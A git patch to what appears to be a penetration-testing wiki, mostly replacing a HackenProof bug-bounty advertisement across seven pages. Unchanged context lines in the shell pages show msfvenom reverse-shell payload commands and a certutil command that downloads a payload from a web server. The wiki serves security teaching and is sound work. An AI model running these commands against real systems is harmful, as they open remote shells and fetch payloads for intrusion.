From 6277fe6f8bcf96ec0292083a49c470d18ecd01ba Mon Sep 17 00:00:00 2001 From: carlospolop Date: Fri, 14 Jul 2023 16:20:34 +0200 Subject: [PATCH] hackenproof --- README.md | 17 +++++-- .../pentesting-wifi/README.md | 51 +++++++++++++------ .../shells/msfvenom.md | 36 +++++++++---- .../shells/windows.md | 51 +++++++++++++------ .../linux-privilege-escalation-checklist.md | 34 +++++++++---- .../README.md | 34 +++++++++---- .../135-pentesting-msrpc.md | 34 +++++++++---- 7 files changed, 183 insertions(+), 74 deletions(-) diff --git a/README.md b/README.md index dbf7709e9..3d6fed58e 100644 --- a/README.md +++ b/README.md @@ -59,15 +59,22 @@ Get Access Today: ### [HACKENPROOF](https://bit.ly/3xrrDrL) -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} \--- diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 9b4a06e0f..63a31bea6 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -12,15 +12,22 @@ -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## Wifi basic commands @@ -300,15 +307,22 @@ So broken and disappeared that I am not going to talk about it. Just know that _ ![](<../../.gitbook/assets/image (125).png>) -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## WPA/WPA2 PSK @@ -808,15 +822,22 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md index 1d12753b8..cd508ac65 100644 --- a/generic-methodologies-and-resources/shells/msfvenom.md +++ b/generic-methodologies-and-resources/shells/msfvenom.md @@ -12,15 +12,24 @@
-
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} + +--- `msfvenom -p -e -f -i LHOST=` @@ -185,15 +194,22 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index 40c891d1d..73029d8a0 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -12,15 +12,22 @@
-
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## Lolbas @@ -324,15 +331,22 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## **Cscript/Wscript** @@ -578,15 +592,22 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive ​ -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index 590395407..967353bd4 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -14,13 +14,22 @@
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +
-🐞 Read web3 bug tutorials +**HackenProof is home to all crypto bug bounties.** -🔔 Get notified about new bug bounties +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -💬 Participate in community discussions +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. + +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) @@ -160,15 +169,22 @@ * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 8dd43614f..a733ab09b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -12,15 +12,22 @@
-
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## Basic MacOS @@ -167,15 +174,22 @@ First of all, please note that **most of the tricks about privilege escalation a * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index ec0aeaaf3..6c5723a1c 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -12,15 +12,22 @@
-
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %} ## Basic Information @@ -105,15 +112,22 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 ​ -
+
-[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs** +**HackenProof is home to all crypto bug bounties.** -🐞 Read web3 bug tutorials +**Get rewarded without delays**\ +HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. -🔔 Get notified about new bug bounties +**Get experience in web3 pentesting**\ +Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. -💬 Participate in community discussions +**Become the web3 hacker legend**\ +Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. + +[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! + +{% embed url="https://hackenproof.com/register" %}